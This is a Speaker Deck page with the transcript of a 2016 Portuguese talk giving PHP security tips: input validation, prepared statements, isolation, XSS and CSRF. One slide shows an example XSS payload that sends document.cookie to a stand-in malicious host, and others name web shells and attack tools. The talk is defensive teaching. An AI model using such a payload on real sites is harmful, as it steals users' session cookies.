Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Dicas de segurança para o PHP e seus amigos

Joubert RedRat
November 18, 2016
Technology
0
25

Dicas de segurança para o PHP e seus amigos

Joubert RedRat

November 18, 2016
Tweet

More Decks by Joubert RedRat

See All by Joubert RedRat
Retome o controle do seu analytics com Matomo
joubertredrat
0
19
#tbt do PHP, a evolução da linguagem nos últimos 30 anos
joubertredrat
0
23
DevBox, o meu pequeno projeto open source para o dia a dia do dev
joubertredrat
0
20
O poder do Object Calisthenics no PHP
joubertredrat
0
92
Playing with Docker and Docker Compose
joubertredrat
0
120
Why migrate your application to microservices?
joubertredrat
0
16
Por que migrar sua aplicação para Microserviços?
joubertredrat
0
24
Uso prático de fakes para mocks no Golang
joubertredrat
0
77
Brincando com comandos no Golang
joubertredrat
0
160

Other Decks in Technology

See All in Technology
NilAway による静的解析で「10 億ドル」を節約する #kyotogo / Kyoto Go 56th
ytaka23
3
380
小学3年生夏休みの自由研究「夏休みに Copilot で遊んでみた」
taichinakamura
0
150
どちらを使う?GitHub or Azure DevOps Ver. 24H2
kkamegawa
0
710
Oracle Cloud Infrastructure:2024年12月度サービス・アップデート
oracle4engineer
PRO
0
170
開発生産性向上! 育成を「改善」と捉えるエンジニア育成戦略
shoota
2
310
Snowflake女子会#3 Snowpipeの良さを5分で語るよ
lana2548
0
230
Qiita埋め込み用スライド
naoki_0531
0
2.8k
GitHub Copilot のテクニック集/GitHub Copilot Techniques
rayuron
27
12k
あの日俺達が夢見たサーバレスアーキテクチャ/the-serverless-architecture-we-dreamed-of
tomoki10
0
430
Postman と API セキュリティ / Postman and API Security
yokawasa
0
200
Wantedly での Datadog 活用事例
bgpat
1
430
マルチプロダクト開発の現場でAWS Security Hubを1年以上運用して得た教訓
muziyoshiz
2
2.2k

Featured

See All Featured
Designing for humans not robots
tammielis
250
25k
Put a Button on it: Removing Barriers to Going Fast.
kastner
59
3.6k
Fontdeck: Realign not Redesign
paulrobertlloyd
82
5.3k
Site-Speed That Sticks
csswizardry
2
190
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
159
15k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
59k
Being A Developer After 40
akosma
87
590k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
330
21k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
29
2.3k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
0
97
A Philosophy of Restraint
colly
203
16k
Scaling GitHub
holman
458
140k

Transcript

  1. Dicas de segurança para o PHP e seus amigos BHACK

    2016 – SEGURANÇA TI CONHECIMENTO

  2. Eu? Sou este ai https://github.com/joubertredrat https://br.linkedin.com/in/joubertredrat https://twitter.com/joubertredrat http://www.vivaolinux.com.br/~joubertredrat * no

    meu Linkedin explica o porque do apelido RedRat https://creativecommons.org/licenses/by-sa/4.0/ Dicas de segurança para o PHP e seus amigos

  3. Dicas de segurança para o PHP e seus amigos INFORMAÇÃO

    É PODER QUEM TEM INFORMAÇÃO DOMINA O MUNDO

  4. Dicas de segurança para o PHP e seus amigos 1ª

    DICA REMOVER INFORMAÇÕES DESNECESSÁRIAS

  5. Dicas de segurança para o PHP e seus amigos 1ª

    DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

  6. Dicas de segurança para o PHP e seus amigos 1ª

    DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

  7. Dicas de segurança para o PHP e seus amigos 2ª

    DICA ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

  8. Dicas de segurança para o PHP e seus amigos 2ª

    DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

  9. Dicas de segurança para o PHP e seus amigos 3ª

    DICA DESABILITAR OU EVITAR RECURSOS EXTERNOS

  10. Dicas de segurança para o PHP e seus amigos 3ª

    DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS R57 R6 C99Shell C100Shell bypass Tool25 b374k GaZa

  11. Dicas de segurança para o PHP e seus amigos 3ª

    DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS http://php.net/allow-url-include

  12. Dicas de segurança para o PHP e seus amigos 4ª

    DICA USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  13. Dicas de segurança para o PHP e seus amigos 4ª

    DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  14. Dicas de segurança para o PHP e seus amigos 5ª

    DICA TRATAR OS DADOS VINDOS DO USUÁRIO MESMO ASSIM QUER USAR QUERY STRING? 4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  15. Dicas de segurança para o PHP e seus amigos 5ª

    DICA - TRATAR OS DADOS VINDOS DO USUÁRIO filter_var mysqli_stmt_bind_param PDOStatement::bindValue DateTime::getLastErrors(); is_(bool,callable,numeric,float,string,object,etc) Libs no Packagist

  16. Dicas de segurança para o PHP e seus amigos 5ª

    DICA - TRATAR OS DADOS VINDOS DO USUÁRIO Quer fazer testes? sqlmap Zed Attack Proxy “ZAP” BeEF sqlninja

  17. Dicas de segurança para o PHP e seus amigos 6ª

    DICA EVITAR O USO DA PRIMARY KEY OU ID

  18. Dicas de segurança para o PHP e seus amigos 6ª

    DICA - EVITAR O USO DA PRIMARY KEY OU ID • UUID • GUID • MD5/CRC32/SHA1/SHA256 • Hash ou Ofuscamento

  19. Dicas de segurança para o PHP e seus amigos 6ª

    DICA - EVITAR O USO DA PRIMARY KEY OU ID

  20. Dicas de segurança para o PHP e seus amigos 7ª

    DICA (PRIMA DA 5ª DICA) CROSS-SITE SCRIPTING

  21. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  22. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  23. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  24. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>

  25. Dicas de segurança para o PHP e seus amigos 8ª

    DICA CROSS SITE REQUEST FORGERY

  26. Dicas de segurança para o PHP e seus amigos 8ª

    DICA - CROSS SITE REQUEST FORGERY

  27. Dicas de segurança para o PHP e seus amigos 9ª

    DICA USAR CHECKSUM OU O VCS AO SEU FAVOR

  28. Dicas de segurança para o PHP e seus amigos 9ª

    DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR

  29. Dicas de segurança para o PHP e seus amigos ACABOU

    AS DICAS POR HOJE PERGUNTAS? FALA QUE NÃO TEM 